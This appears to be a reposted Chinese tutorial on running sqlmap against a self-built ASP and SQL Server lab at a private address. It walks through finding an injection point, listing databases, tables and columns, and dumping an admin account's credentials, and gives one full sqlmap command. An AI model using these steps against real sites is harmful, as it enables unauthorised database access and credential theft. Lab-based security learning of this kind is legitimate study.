| 关键词: 192.168 sqlmap onews 数据库 asp http 1.30 sqlZR 字段 学习 |
今天搭建了一个asp+mssql数据库的环境用于安全测试学习 1.判断注入点及获取网站信息:
![]() web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2005 2.获取所有数据库:
![]() 网站用的数据库是这个sqlZR 3.获取网站当前使用的数据库:
4.获取数据库中的表名:
![]() 5.获取数据表中的字段名:sqlmap -u http://192.168.1.30/1/onews.asp?id=8 -D sqlZR -T Admin --columns ![]() 6.获取字段中的内容
![]() 看到了吧,几条命名就把管理员的账号密码给跑出来了。 学习网络安全技术的话,可以关注我,每天都会有相应的教程发布的,咱们共同学习,进步 |
| 本文出处: https://www.toutiao.com/a6805076641253949959/ |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|